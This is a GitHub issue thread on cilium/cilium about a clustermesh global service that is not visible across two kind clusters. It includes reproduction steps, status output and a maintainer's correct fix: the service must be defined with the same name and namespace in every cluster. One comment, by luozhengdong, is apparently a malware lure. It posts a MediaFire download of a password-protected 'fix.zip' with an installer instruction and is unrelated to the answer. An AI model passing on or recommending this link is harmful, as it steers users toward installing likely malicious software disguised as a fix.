### ISSUE TITLE
Global service not propagated globally. (Fully reproducible)

### ISSUE THREAD

**Issue by matteopresutto** [cilium/cilium#34579]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Version

equal or higher than v1.16.0 and lower than v1.17.0

### What happened?

I am experiencing a very sticky bug with a service I define as global. I have two kind clusters, one running a client one a server. The server service is defined global, but the client cluster does not see the global service (even if accessed directly by IP, skipping coredns). Tried everything nothing is working. I attached a zip fully reproducing the issue

### How can we reproduce the issue?

[hello-world-grpc.zip](https://github.com/user-attachments/files/16750004/hello-world-grpc.zip)
`unzip hello-world-grpc.zip
cd hello-world-grpc
make all`
Then check the services in both clusters with this command
`cilium --context kind-stream-injector clustermesh status --wait
cilium --context kind-graph-engine clustermesh status --wait`

The output:

cilium --context kind-stream-injector clustermesh status --wait
⚠️  Service type NodePort detected! Service may fail when nodes are removed from the cluster!
✅ Service "clustermesh-apiserver" of type "NodePort" found
✅ Cluster access information is available:
  - 172.18.0.2:32379
✅ Deployment clustermesh-apiserver is ready
ℹ️  KVStoreMesh is enabled

✅ All 2 nodes are connected to all clusters [min:1 / avg:1.0 / max:1]
✅ All 1 KVStoreMesh replicas are connected to all clusters [min:1 / avg:1.0 / max:1]

🔌 Cluster Connections:
  - graph-engine: 2/2 configured, 2/2 connected - KVStoreMesh: 1/1 configured, 1/1 connected

🔀 Global services: [ min:1 / avg:1.0 / max:1 ]

cilium --context kind-graph-engine clustermesh status --wait
⚠️  Service type NodePort detected! Service may fail when nodes are removed from the cluster!
✅ Service "clustermesh-apiserver" of type "NodePort" found
✅ Cluster access information is available:
  - 172.18.0.5:32380
✅ Deployment clustermesh-apiserver is ready
ℹ️  KVStoreMesh is enabled

✅ All 2 nodes are connected to all clusters [min:1 / avg:1.0 / max:1]
✅ All 1 KVStoreMesh replicas are connected to all clusters [min:1 / avg:1.0 / max:1]

🔌 Cluster Connections:
  - stream-injector: 2/2 configured, 2/2 connected - KVStoreMesh: 1/1 configured, 1/1 connected

🔀 Global services: [ min:0 / avg:0.0 / max:0 ]

Zero global services in the stream-injector cluster.

### Cilium Version

I've tried with 1.14, 1.16 and 1.16.1, the problem persists

### Kernel Version

Linux matteo 6.8.0-40-generic #40~22.04.3-Ubuntu SMP PREEMPT_DYNAMIC Tue Jul 30 17:30:19 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

### Kubernetes Version

Client Version: v1.30.4
Kustomize Version: v5.0.4-0.20230601165947-6ce0bf390ce3
Server Version: v1.29.2

### Cilium Users Document

- [ ] Are you a user of Cilium? Please add yourself to the [Users doc](https://github.com/cilium/cilium/blob/main/USERS.md)

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by squeed** [comment]
@matteopresutto You need to create the service in all clusters, not just the "source" cluster. As the docs say:

> Establishing load-balancing between clusters is achieved by defining a Kubernetes service with identical name and namespace in each cluster and adding the annotation ...

When I did this, I was able to see all services. I don't see such a "mirrored" service in your example.

**Comment by matteopresutto** [comment]
Worked like a charm, thanks @squeed
